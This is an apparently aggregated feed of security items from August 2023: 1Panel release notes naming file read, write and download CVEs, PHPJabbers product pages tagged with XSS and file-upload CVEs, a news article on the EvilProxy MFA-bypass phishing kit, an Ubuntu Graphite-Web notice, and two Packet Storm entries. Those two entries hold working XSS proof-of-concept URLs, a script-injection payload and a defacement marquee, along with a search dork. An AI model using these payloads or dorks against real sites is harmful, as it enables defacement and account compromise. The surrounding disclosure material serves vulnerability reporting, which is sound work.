1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, an arbitrary file write vulnerability could lead to direct control of the server. In the `api/v1/file.go` file, there is a function called `SaveContentthat,It `recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations. Version 1.5.0 contains a patch for this issue.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 新特性**

*   【网站】支持 PHP 运行环境类型网站切换版本。 by @zhengkunwang223 in #1748
*   【网站】支持网站设置重定向。 by @zhengkunwang223 in #1731
*   【数据库】支持添加 MySQL 远程数据库。 by @ssongliu in #1744
*   【主机】增加进程守护管理。 by @zhengkunwang223 in #1786

**2.2 功能优化**

*   【网站】网站设置 IPv6 功能优化。 by @zhengkunwang223 in #1732
*   【网站】网站防盗链页面样式优化。 by @zhengkunwang223 in #1807
*   【网站】网站设置页面添加反向代理时支持用户选择传输协议。 by @zhengkunwang223 in #1832
*   【网站】编辑 PHP 运行环境后增加关联应用重建的提示信息。 by @zhengkunwang223 in #1896
*   【应用商店】应用升级时增加备份选项。 by @zhengkunwang223 in #1750
*   【应用商店】已安装应用列表增加 HTTPS 类型端口的跳转功能。 by @zhengkunwang223 in #1870
*   【应用商店】全部应用和已安装应用列表页面样式优化。 by @zhengkunwang223 in #1895
*   【应用商店】应用依赖 Redis 时，创建页面自动填充 Redis 密码。 by @zhengkunwang223 in #1826
*   【数据库】数据库密码校验规则优化。 by @ssongliu in #1815
*   【数据库】数据库连接信息样式优化。 by @ssongliu in #1857
*   【容器】容器创建页面部分字段翻译优化。 by @SkyAerope in #1797
*   【主机】文件列表记录文件浏览器最后一次访问的路径。 by @zhengkunwang223 in #1753
*   【主机】文件列表页面适配移动端。 by @wangdan-fit2cloud in #1730
*   【主机】监控页面调整数据默认采集间隔和保存时间。 by @ssongliu in #1795
*   【面板设置】创建系统快照前停止所有定时任务。 by @ssongliu in #1888
*   【面板设置】服务器地址支持设置域名。 by @ssongliu in #1778
*   【面板设置】备份账号页面部分按钮样式优化。 by @ssongliu in #1893
*   【面板设置】创建快照逻辑优化。 by @ssongliu in #1805
*   【系统】登录页增加切换语言选项。 by @zhengkunwang223 in #1752
*   【系统】部分页面样式适配移动端。 by @wangdan-fit2cloud in #1891
*   【系统】移除不必要的 SSH Session 连接。 by @LeeEirc in #1780
*   【系统】部分页面分页排序样式优化。 by @ssongliu in #1821
*   【系统】创建抽屉页面不再动态显示名称。 by @ssongliu in #1777

**2.3 问题修复**

*   【网站】修复了部分场景下创建 PHP 运行环境异常的问题。 by @zhengkunwang223 in #1882
*   【应用商店】修复了应用升级后无法编辑最新配置的问题。 by @zhengkunwang223 in #1824
*   【应用商店】修复了更新应用列表后可能出现多个同名应用的问题。 by @zhengkunwang223 in #1827
*   【应用商店】修复了 Cloudreve 升级后数据丢失的问题。 by @zhengkunwang223 in #1822
*   【应用商店】修复了编辑应用时关闭高级设置之后没有提示端口放开的问题。 by @zhengkunwang223 in #1887
*   【应用商店】修复了安装应用时数据库密码包含 & $ 等特殊字符时提示错误的问题。 by @zhengkunwang223 in #1809
*   【数据库】修复了数据库日志监听未刷新的问题。 by @ssongliu in #1823
*   【容器】修复了编辑容器时不显示手动挂载的挂载卷的问题。 by @ssongliu in #1783
*   【容器】修复了编辑容器时由于端口冲突导致容器被删除的问题。 by @ssongliu in #1770
*   【主机】修复了文件压缩时无法选择文件夹的问题。 by @zhengkunwang223 in #1802
*   【主机】修复了当 SSH 登录日志涉及多个年份时导致数据异常的问题。 by @ssongliu in #1785
*   【面板设置】修复了同步快照路径错误的问题。 by @ssongliu in #1863
*   【系统】修复了系统安装在根目录时导致升级失败的问题。 by @ssongliu in #1776

**2.4 应用商店**

*   新增 JumpServer。 by @wojiushixiaobai in 1Panel-dev/appstore#238
*   新增 SFTPGo。 by @wanghe-fit2cloud in 1Panel-dev/appstore#269
*   新增 PGAdmin4。 by @wojiushixiaobai in 1Panel-dev/appstore#246
*   新增 frp。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Discuz。 by @okxlin in 1Panel-dev/appstore#227
*   新增 Nextcloud。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Domain Admin。 by @mouday in 1Panel-dev/appstore#278
*   新增 emlog。 by @emlog in 1Panel-dev/appstore#276
*   新增 ZFile。 by @okxlin in 1Panel-dev/appstore#299
*   新增 MeiliSearch。 by @CyJaySong in 1Panel-dev/appstore#219
*   新增 ChatGPT Web。 by @okxlin in 1Panel-dev/appstore#274
*   新增 Home Assistant。 by @okxlin in 1Panel-dev/appstore#299
*   AdGuardHome 版本升级至 v0.107.36。 by @renovate in 1Panel-dev/appstore#293
*   OpenResty 版本升级至 1.21.4.2-0。 by @wuhang2003 in 1Panel-dev/appstore#300
*   Tailchat 版本升级至 v1.8.8。 by @renovate in 1Panel-dev/appstore#305
*   青龙 版本升级至 v2.16.0。 by @renovate in 1Panel-dev/appstore#306
*   ddns-go 版本升级至 v5.6.0。 by @renovate in 1Panel-dev/appstore#307
*   Memos 版本升级至 v0.14.3。 by @renovate in 1Panel-dev/appstore#304
*   Jenkins 版本升级至 v2.418。 by @renovate in 1Panel-dev/appstore#312
*   Cloudreve 版本升级至 v3.8.2。 by @renovate in 1Panel-dev/appstore#308
*   Alist 版本升级至 v3.25.1。 by @renovate in 1Panel-dev/appstore#309

**2.5 安全更新**

*   修复了部分文件接口存在任意文件读取漏洞的问题。 (CVE-2023-39964)
*   修复了部分文件接口存在任意文件下载漏洞的问题。 (CVE-2023-39965)
*   修复了部分文件接口存在任意文件写入漏洞的问题。 (CVE-2023-39966)

CVE-2023-39966: Release v1.5.0 · 1Panel-dev/1Panel

There is a Cross Site Scripting (XSS) vulnerability in the value-enum-o_bf_include_timezone parameter of index.php in PHPJabbers Callback Widget v1.0.

Turn your website visitors into hot leads by enabling them to request a callback.

Version: 1.0

The Callback Widget is a simple PHP script that places a discreet callback button on your website. It allows your clients and website visitors to establish direct contact with your customer support or sales team and schedule a free callback at a convenient time. The callback form fields and color theme can be easily customized from the back-end Admin Panel. The callback button facilitates communication both within and outside business hours and is also an indispensable lead generation tool that will drive conversions.

**Callback Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a Callback Widget on your website and make it easier for your potential customers to get in touch with your customer support or sales team. The request callback widget can be integrated into any website, including WordPress and Joomla sites. The front end of the PHP script consists of a callback button and an editable callback form.

Editable Callback Form

Depending on the information you need to collect from your clients, you can customize the callback request form and enable or disable fields or add required fields.

Email & SMS Notifications

You can create autoresponder messages that are sent via email or SMS both to clients and admins upon a new callback request. To enable the SMS functionality, just contact us.

Different Callback Reasons

According to their type of business, script admins can predefine different reasons for callbacks that will appear in the request callback form. These can be edited and enabled or disabled at any time.

Mobile-Friendly & Modern Design

The Callback Widget's front end can be loaded across various devices and screen sizes. The callback form is available in 10 different color variations designed to best match your website branding.

Automatic Time Conversion

In order to prevent potential time difference mix-ups, the best time to call and the timezone specified by customers is automatically converted to the default time set in the back-end system.

Export Callback Requests

Generate CSV and XML files for the callback requests in any selected period. You can also import iCal to Google Calendar. Password-protect your data so only authorized people have access.

Multi-Language Support

Translate all titles and alerts in the front end and back end to any language you need. Search for specific text parts and use the unique text IDs to add the translations in a new language.

PHP Source Code Customization

Buy the Callback Widget with a Developer License and make your own modifications to the source code. We can also customize the callback form for you upon request. Compare licenses  

SPECIAL OFFER

**Callback Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Callback Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Callback Widget**

**Key Benefits**

Extended Licence

High Performance

Remote Hosting

Customizations

Key Features

**Pricing**

You can buy the Callback Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our callback button and how the widget has improved their online business.

“

I am very impressed with the scripts you provide, and for non-highly technical users like me, your PHP scripts are so easy to use. Plus, you just saved me money and time for installing the scripts for me. Your customer service is unbeatable.

Jennifer Solis

“

You guys are great! Your PHP scripts helped me to upgrade my websites. Your after-sales help is the best I have ever had. I can't thank you enough. Anyone who doesn't give PHPJabbers a try will be missing out! Thanks again! I'll be back for more! And I mean it too!  
Grace and Peace

Eric Mapp

“

What a great service. I'm telling everyone about how good you guys are. I will always look to your site for scripts before anywhere else.

Cameron Forster

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Callback Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Ticket Support Script**

$19 / $29

**PHP Contact Form Generator**

$19 / $29

**Member Directory Script**

$39 / $79

**Appointment Scheduler**

$69 / $129

**Make An Offer Widget**

$19 / $29

**PHP Review Script**

$39 / $79

CVE-2023-36312: Callback Widget | Callback Button

There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Callback Widget v1.0.

Turn your website visitors into hot leads by enabling them to request a callback.

Version: 1.0

The Callback Widget is a simple PHP script that places a discreet callback button on your website. It allows your clients and website visitors to establish direct contact with your customer support or sales team and schedule a free callback at a convenient time. The callback form fields and color theme can be easily customized from the back-end Admin Panel. The callback button facilitates communication both within and outside business hours and is also an indispensable lead generation tool that will drive conversions.

**Callback Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Add a Callback Widget on your website and make it easier for your potential customers to get in touch with your customer support or sales team. The request callback widget can be integrated into any website, including WordPress and Joomla sites. The front end of the PHP script consists of a callback button and an editable callback form.

Editable Callback Form

Depending on the information you need to collect from your clients, you can customize the callback request form and enable or disable fields or add required fields.

Email & SMS Notifications

You can create autoresponder messages that are sent via email or SMS both to clients and admins upon a new callback request. To enable the SMS functionality, just contact us.

Different Callback Reasons

According to their type of business, script admins can predefine different reasons for callbacks that will appear in the request callback form. These can be edited and enabled or disabled at any time.

Mobile-Friendly & Modern Design

The Callback Widget's front end can be loaded across various devices and screen sizes. The callback form is available in 10 different color variations designed to best match your website branding.

Automatic Time Conversion

In order to prevent potential time difference mix-ups, the best time to call and the timezone specified by customers is automatically converted to the default time set in the back-end system.

Export Callback Requests

Generate CSV and XML files for the callback requests in any selected period. You can also import iCal to Google Calendar. Password-protect your data so only authorized people have access.

Multi-Language Support

Translate all titles and alerts in the front end and back end to any language you need. Search for specific text parts and use the unique text IDs to add the translations in a new language.

PHP Source Code Customization

Buy the Callback Widget with a Developer License and make your own modifications to the source code. We can also customize the callback form for you upon request. Compare licenses  

SPECIAL OFFER

**Callback Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Callback Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Callback Widget**

**Key Benefits**

Key Features

One admiN

Extended Licence

Installation Support

Payment Gateways

**Pricing**

You can buy the Callback Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our callback button and how the widget has improved their online business.

“

I am very impressed with the scripts you provide, and for non-highly technical users like me, your PHP scripts are so easy to use. Plus, you just saved me money and time for installing the scripts for me. Your customer service is unbeatable.

Jennifer Solis

“

You guys are great! Your PHP scripts helped me to upgrade my websites. Your after-sales help is the best I have ever had. I can't thank you enough. Anyone who doesn't give PHPJabbers a try will be missing out! Thanks again! I'll be back for more! And I mean it too!  
Grace and Peace

Eric Mapp

“

What a great service. I'm telling everyone about how good you guys are. I will always look to your site for scripts before anywhere else.

Cameron Forster

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Callback Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Ticket Support Script**

$19 / $29

**PHP Contact Form Generator**

$19 / $29

**Member Directory Script**

$39 / $79

**Appointment Scheduler**

$69 / $129

**Make An Offer Widget**

$19 / $29

**PHP Review Script**

$39 / $79

CVE-2023-36315: Callback Widget | Callback Button

By Habiba Rashid
The EvilProxy phishing kit is a malicious tool that has emerged as a key player, as it exploits MFA's limitations. So far, it has targeted over 100 firms.
This is a post from HackRead.com Read the original post: EvilProxy Phishing Kit Hits 100+ Firms, Bypasses MFA via Reverse Proxy

*   Proofpoint’s report highlights a rise in account takeovers, contradicting expectations of MFA’s effectiveness.
*   Malicious EvilProxy phishing kit emerges as a key player, exploiting MFA’s limitations.
*   EvilProxy employs a complex infection chain, utilizing legitimate redirectors and reverse proxy architecture.
*   High-level executives are targeted due to their access to sensitive data; 39% of compromised users held C-level positions.
*   Organizations urged to enhance email, cloud, and web security, and consider better authentication methods like FIDO-based keys.

Cybersecurity firm Proofpoint’s recent report has revealed a surge in account takeovers, defying the expectation that multi-factor authentication (MFA) would curb such incidents. The firm’s research showed that at least 35% of compromised users over the past year were equipped with MFA protection. It seems threat actors have found a way to exploit this defence.

The key protagonist in this narrative is the malicious phishing kit dubbed EvilProxy. As MFA gained traction, attackers responded with sophisticated methods to bypass this layer of security. EvilProxy, a reverse proxy-based phishing kit, has taken center stage in these endeavours, demonstrating its prowess by targeting thousands of users, including a significant number of C-suite executives.

Reverse Proxy (Proofpoint)

The method of attack involves a complex multi-step infection chain. Phishing emails, often impersonating trusted services like DocuSign and Adobe, contain malicious links that redirect users through a labyrinth of legitimate redirectors, including YouTube, malicious cookies, and 404 redirects. At the core of this campaign lies EvilProxy’s reverse proxy architecture. The kit intercepts MFA requests, obtains valid session cookies, and leverages them for authentication in the actual domain.

What is striking about this campaign is the attackers’ discrimination in targeting. They prioritized high-level executives due to their potential access to sensitive data and financial assets. Proofpoint’s study indicated that out of numerous compromised users, approximately 39% held C-level executive positions, including 17% who were chief financial officers and 9% who were presidents and CEOs.

Roles compromised in the attack (Proofpoint)

Once the attackers obtain access, their post-compromise activities include establishing persistence within the organization’s cloud environment. They leverage Microsoft 365 applications for MFA manipulation, further cementing their control. This persistent access opens avenues for lateral movement and potential malware deployment.

Proofpoint’s findings have shone a spotlight on the relentless evolution of cyber threats, highlighting that even the most secure of defences can be outmanoeuvred. The rise of EvilProxy as a tool of choice for such attacks has exposed critical vulnerabilities in organizational defence strategies. With a 100% increase in cloud account takeover incidents targeting high-level executives in the past six months, the battle between attackers and defenders continues to escalate.

Organizations are urged to strengthen their defences against these advanced hybrid threats by focusing on email security, cloud security, web security, and user awareness, and considering adopting better authentication methods, such as FIDO-based physical security keys. 

**RELATED ARTICLES**

1.  Warning as hackers breach MFA to target cloud services
2.  Global CDN Service ‘jsdelivr’ Exposed Users to Phishing Attacks
3.  FortiGuard Labs Discovers .ZIP Domains Fueling Phishing Attacks
4.  New Phishing Attack Spoofs Microsoft 365 Authentication System
5.  “Picture in Picture” Tactic Exploited in New Deceptive Phishing Attack

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

EvilProxy Phishing Kit Hits 100+ Firms, Bypasses MFA via Reverse Proxy

A File Upload vulnerability in PHPJabbers Ticket Support Script v3.2 allows attackers to execute arbitrary code via uploading a crafted file.

Embed an efficient and reliable help desk system into your website!

Version: 3.2

An affordable online help desk system that enables you to manage and consolidate all customer support requests at one online centralized location. Simple installation, one-time payment, fully customizable – an easy-to-use support ticket system. Our Ticket Support Script will not only provide you with an online help desk but it will empower you to manage and keep tickets in check. Take a closer look and contact us, if you have any questions or want to request a modification!

**Ticket Support Script**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Every company providing maintenance and post-sale support services needs a simple and reliable support ticket system to manage customer requests and issues. Integrate our smart help desk system into your website and keep your finger on the pulse of your customers' needs!

Smart Ticket Management

Handle multiple customer support and client requests. Process, edit, delete, and export tickets. Add tickets manually on behalf of clients.

Versatile & Responsive Design

The front-end UI of our help desk software is optimized for mobile devices. You can preview and enable 10 different color themes.

Canned Messages

Support members can use predefined messages in standard situations and thus improve turn-around time and quality.

Ticket Rating Tool

Clients can rate ticket replies they have received from the support team. They only need to click on the respective smiley or frownie.

Customer Panel

Clients can communicate with your staff, follow up and read ticket replies from a password-protected profile area on the front end.

Email Notifications

Notify clients as soon as their tickets have been processed. Send automatic emails to all departments upon each new ticket received.

Ticket Assignment

Clients can direct tickets to different departments through the online form. Team leaders can assign tickets to agents from the back end.

PHP Source Code Customization

If you buy the Developer License, you can make your own custom changes to the ticket support system, or ask us for a modification.

SPECIAL OFFER

**Ticket Support Script for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Ticket Support Script and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Ticket Support Script**

**Key Benefits**

High Performance

Key Features

Extended Licence

Installation Support

Remote Hosting

**Pricing**

You can buy the PHP ticketing system both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our support ticket system and how the script has improved their online business.

“

Hi PHPJabbers,  
It's not very often these days people let you know when you've done something right, on the contrary, they sure let you know when you've done something wrong.  
I would just like to show my appreciation by thanking you guy's for supplying me with a superb script that does exactly what it say's on the box. It looks good and works well.  
In addition to this you also backed it up with technical support that got it right first time, after I inadvertently entered some wrong information into the setup file.  
Once again, thank you for all your hard work.

Graham Clipson

“

Our small family business it's getting better each day thanks to PHPJabbers scripts. Outstanding customer support, clean and open source code is what every webmaster looking for. So don't look any further because you're on the right place. You will not only get the quality software, you will learn and benefit more than you know.  
Thanks once again! I'm looking forward for PHPJabbers' new solutions and right now I'm interested in a ticket support system so I will check it a little bit.

Bruno

“

That works perfectly!!! I couldn't be more happy. Thank you so much for doing a good job and making these PHP scripts so affordable. This is the 5th script I have bought from PHPJabbers and I continue to be the happiest of customers! I will buy more and continue to recommend you guys and your site PHPJabbers.com at all the web developer/design meetings I attend.

Matt Wechsler

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Ticket Support Script.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Knowledge Base Builder**

$19 / $29

**File Sharing Script**

$29 / $49

**PHP Contact Form Generator**

$19 / $29

**Callback Widget**

$19 / $29

**PHP Forum Script**

$19 / $29

**Document Creator**

$19 / $39

CVE-2023-39776: Ticket Support Script | Online Help Desk System

Ubuntu Security Notice 6243-2 - USN-6243-1 fixed vulnerabilities in Graphite-Web. It was discovered that the applied fix was incomplete. This update fixes the problem. It was discovered that Graphite-Web incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform server-side request forgery and obtain sensitive information. This issue only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6243-2  
August 09, 2023

graphite-web regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

USN-6243-1 caused a minor regression in Graphite-Web.

Software Description:  
- graphite-web: A highly scalable real-time graphing system

Details:

USN-6243-1 fixed vulnerabilities in Graphite-Web. It was discovered that the  
applied fix was incomplete. This update fixes the problem.

Original advisory details:

  It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
  user or an automated system were tricked into opening a specially crafted  
  input file, a remote attacker could possibly use this issue to perform  
  server-side request forgery and obtain sensitive information. This issue  
  only affected Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. (CVE-2017-18638)

  It was discovered that Graphite-Web incorrectly handled certain inputs. If a  
  user or an automated system were tricked into opening a specially crafted  
  input file, a remote attacker could possibly use this issue to perform  
  cross site scripting and obtain sensitive information. (CVE-2022-4728,  
  CVE-2022-4729, CVE-2022-4730)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   graphite-web                    1.0.2+debian-2ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6243-2  
   https://ubuntu.com/security/notices/USN-6243-1  
   https://launchpad.net/bugs/2030807

Ubuntu Security Notice USN-6243-2

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

DriverPack Solution CMS 17.11.108 Cross Site Scripting

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ee75f970e155669b73118332fbaa7e9c33f33900005bfc151805b9ba771cd102

Download | Favorite | View

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Desenvolvido C3iM CMS v2.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://c3im.pt/                                                                                                    |  | # Dork      : intext:''Desenvolvido C3iM'' site:pt                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
